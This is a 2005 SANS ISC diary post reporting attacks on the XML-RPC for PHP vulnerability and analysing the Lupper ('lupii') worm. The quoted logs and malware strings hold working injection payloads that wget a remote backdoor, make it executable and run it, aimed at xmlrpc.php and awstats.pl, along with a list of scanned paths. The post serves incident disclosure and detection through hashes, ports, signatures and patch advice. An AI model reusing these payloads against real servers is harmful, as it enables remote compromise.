Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: InfoSec Handlers Diary Blog - XML-RPC for PHP Vulnerability Attack InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

XML-RPC for PHP Vulnerability Attack

Published: 2005-11-05
Last Updated: 2005-11-07 08:25:28 UTC
by Koon Yaw Tan (Version: 1)
0 comment(s)
We have received a few reports on an attack exploiting xml-rpc for php vulnerability.

xml-rpc for php is used in a large number of popular web applications such as PostNuke, Drupal, b2evolution, Xoops, WordPress, PHPGroupWare and TikiWiki. When exploited, this could compromise a vulnerable system. Most of these packages should have xml-rpc for php vulnerability fixed in the latest version. If you are still running an old version, you should get it updated immediately.

From the submitted logs, it attempts to wget a remote access Trojan from one system and using the Trojan to try to connect to another site via port 8080.

Sample logs as shown:
000 : 50 4F 53 54 20 2F 70 68 70 67 72 6F 75 70 77 61   POST /phpgroupwa
010 : 72 65 2F 78 6D 6C 72 70 63 2E 70 68 70 20 48 54   re/xmlrpc.php HT
020 : 54 50 2F 31 2E 31 0A 48 6F 73 74 3A 20 32 xx 2E   TP/1.1.Host: xx.
030 : xx xx xx 2E 39 34 2E 32 32 32 0A 43 6F 6E 74 65   xxx.94.222.Conte
040 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 78 6D   nt-Type: text/xm
050 : 6C 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68   l.Content-Length
060 : 3A 32 36 39 0A 0A 3C 3F 78 6D 6C 20 76 65 72 73   :269..<?xml vers
070 : 69 6F 6E 3D 22 31 2E 30 22 3F 3E 3C 6D 65 74 68   ion="1.0"?><meth
080 : 6F 64 43 61 6C 6C 3E 3C 6D 65 74 68 6F 64 4E 61   odCall><methodNa
090 : 6D 65 3E 74 65 73 74 2E 6D 65 74 68 6F 64 3C 2F   me>test.method</
0a0 : 6D 65 74 68 6F 64 4E 61 6D 65 3E 3C 70 61 72 61   methodName><para
0b0 : 6D 73 3E 3C 70 61 72 61 6D 3E 3C 76 61 6C 75 65   ms><param><value
0c0 : 3E 3C 6E 61 6D 65 3E 27 2C 27 27 29 29 3B 65 63   ><name>',''));ec
0d0 : 68 6F 20 27 5F 62 65 67 69 6E 5F 27 3B 65 63 68   ho '_begin_';ech
0e0 : 6F 20 60 63 64 20 2F 74 6D 70 3B 77 67 65 74 20   o `cd /tmp;wget
0f0 : xx xx xx 2E xx xx xx 2E 32 35 35 2E 34 34 2F 63   xxx.xxx.255.44/c
100 : 62 61 63 6B 3B 63 68 6D 6F 64 20 2B 78 20 63 62   back;chmod +x cb
110 : 61 63 6B 3B 2E 2F 63 62 61 63 6B 20 xx xx 2E xx   ack;./cback xx.x
120 : xx 2E xx xx xx 2E 31 34 20 38 30 38 30 60 3B 65   x.xxx.14 8080`;e
130 : 63 68 6F 20 27 5F 65 6E 64 5F 27 3B 65 78 69 74   cho '_end_';exit
140 : 3B 2F 2A 3C 2F 6E 61 6D 65 3E 3C 2F 76 61 6C 75   ;/*</name></valu
150 : 65 3E 3C 2F 70 61 72 61 6D 3E 3C 2F 70 61 72 61   e></param></para
160 : 6D 73 3E 3C 2F 6D 65 74 68 6F 64 43 61 6C 6C 3E   ms></methodCall>

The following xmlrpc.php attempts are seen:
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/b2evo/xmlsrv/xmlrpc.php
/b2/xmlsrv/xmlrpc.php
/blogtest/xmlsrv/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/blogs/xmlrpc.php
/community/xmlrpc.php
/drupal/xmlrpc.php
/blog/xmlrpc.php
/services/xmlrpc.php
/xmlsrv/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlrpc.php

A scan from VirusTotal detects "cback" as:
Antivirus     Version     Update         Result
Fortinet     2.48.0.0     11.04.2005     Linux/Rev.B-bdr
Kaspersky     4.0.2.24     11.05.2005     Backdoor.Linux.Small.al
McAfee         4620         11.04.2005     Linux/BackDoor-Rev.b

We have earlier reported this observation.

Another submission from Morten gives a slightly different binary (lupii) but is exploiting the same vulnerability.

Part of the strings in this malware (lupii) is shown below:
Port is in use
Operation pending
Unknown
webmaster@mydomain.com
.hlp
find / -type f
/proc
/dev
/bin
GET %s?|cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`xx.xx.193.244/lupii;chmod$IFS+
x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`xx.xx.193.244| HTTP/1.1

Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
GET %sawstats.pl?configdir=|echo;echo%%20YYY;cd%%20%%2ftmp%%3bwget%%20xx
%%2exx%%2e193%%2e244%%2flupii%%3bchmod%%20%%2bx%%20lupii%%3b%%2e
%%2flupii%%20xx%%2exx%%2e193%%2e244;
echo%%20YYY;echo|  HTTP/1.1

Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
POST %s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
Content-Length:269
<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params>
<param><value><name>',''));echo '_begin_';echo `cd /tmp;wget xx.xx.193.244/lupii;chmod +x lupii;./lupii xx.xx.193.244 `;echo '_end_';exit;/*</name></value></param></params>
</methodCall>

/cgi-bin/
/scgi-bin/
/awstats/
/cgi-bin/awstats/
/scgi-bin/awstats/
/cgi/awstats/
/scgi/awstats/
/scripts/
/cgi-bin/stats/
/scgi-bin/stats/
/stats/
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
/blog/xmlrpc.php
/drupal/xmlrpc.php
/community/xmlrpc.php
/blogs/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogtest/xmlsrv/xmlrpc.php
/b2/xmlsrv/xmlrpc.php
/b2evo/xmlsrv/xmlrpc.php
/wordpress/xmlrpc.php
/phpgroupware/xmlrpc.php
/cgi-bin/includer.cgi
/scgi-bin/includer.cgi
/includer.cgi
/cgi-bin/include/includer.cgi
/scgi-bin/include/includer.cgi
/cgi-bin/inc/includer.cgi
/scgi-bin/inc/includer.cgi
/cgi-local/includer.cgi
/scgi-local/includer.cgi
/cgi/includer.cgi
/scgi/includer.cgi
/hints.pl
/cgi/hints.pl
/scgi/hints.pl
/cgi-bin/hints.pl
/scgi-bin/hints.pl
/hints/hints.pl
/cgi-bin/hints/hints.pl
/scgi-bin/hints/hints.pl
/webhints/hints.pl
/cgi-bin/webhints/hints.pl
/scgi-bin/webhints/hints.pl
/hints.cgi
/cgi/hints.cgi
/scgi/hints.cgi
/cgi-bin/hints.cgi
/scgi-bin/hints.cgi
/hints/hints.cgi
/cgi-bin/hints/hints.cgi
/scgi-bin/hints/hints.cgi
/webhints/hints.cgi
/cgi-bin/webhints/hints.cgi
/scgi-bin/webhints/hints.cgi
/dev/null
Error: %s
Insufficient memory
%d.%d.%d.%d
Unable to execute command
127.0.0.1
Size must be less than or equal to 9216
Cannot packet local networks

<Update 1>
Luke has done a quick analysis of the assembly code of lupii and reveals that it listens and communicates on UDP/7111 in the "audp_listen" function (confirmed with netstat). Assembly segment below:

804bca5: 68 c7 1b 00 00 push   $0x1bc7
804bcaa: 68 40 4b 05 08 push   $0x8054b40
804bcaf: e8 5b e1 ff ff call   8049e0f <audp_listen>

Note that $0x1bc7 (the first argument) is 7111 in decimal. Thus, activity on this port may be indicative of infection.

Checking on port 7111, it happens that there is a spike recently too (UDP on 3 Nov 05).
http://isc.sans.org/port_details.php?port=7111
</Update 1>

<Update 2>
Another reader has another finding that it listens on UDP 7222 instead:
1. Runs on RedHat Enterprise Workstation 4.
2. Opens up udp:7222.
3. Exchanges some info with <IP_address_of_the_reporting_host> over udp 7222.
4. Remains active in the background.
5. Starts a SYN scan to port 80 on random destinations, this particular example it used a class A address, keeping the first 2 octets unchanged and changing just the last 2 octets of the address, in order from X.Y.0.0 to X.Y.z.w.
6. It doesn't seem to be downloading anything from the Internet.
7. It tries several ways to infect the scanned system, all are based on CGI command execution/code injection: awstats.pl, webhints, xml-rp for php etc.

A check on the md5sum on the two lupii copies received, the md5sum are different. Thus, it could be another variant.

md5sum c9cd7949a358434bfdd8d8f002c7996b: listen on UDP 7111
md5sum df0e169930103b504081aa1994be870d: listen on UDP 7222
md5sum 31a1920b320cd52f684ffb984ef2b05a: listen on UDP 7222

BTW the reader points out that "lupii" means in Romanian "The Wolves".
</Update 2>

<Update 3>
Antivirus vendors are starting to come out with signatures to detect this malware:
Symantec - Linux.Plupii
McAfee - Linux/Lupper.worm
CA - Linux/Lupper.A; Linux/Lupper.B
ClamAV - Exploit.Linux.Lupii (Scan result from Virus Total)
Kaspersky - Exploit.Linux.Small.x (Scan result from VirusTotal)

Thanks to Juha-Matti for pointing this out.
</Update 3>

You can find the details of the vulnerability at:
http://www.gulftech.org/?node=research&article_id=00088-07022005
http://www.securityfocus.com/bid/14088/
http://secunia.com/advisories/15852/

For a list of vulnerable applications, please refer to:
http://www.securityfocus.com/bid/14088/info
http://www.osvdb.org/17793

If you are running a vulnerable version, you are advised to upgrade immediately:
http://www.securityfocus.com/bid/14088/solution

If you are running Snort, the Snort ID is 3827 (WEB-PHP xmlrpc.php post attempt).

Thanks to Keith, Morten, Luke and many many other readers for their submission and sharing.

We will post updates when available. If you have any new findings or experience the same attack, do send us a note at our contact page.

Keywords:
0 comment(s)
Diary Archives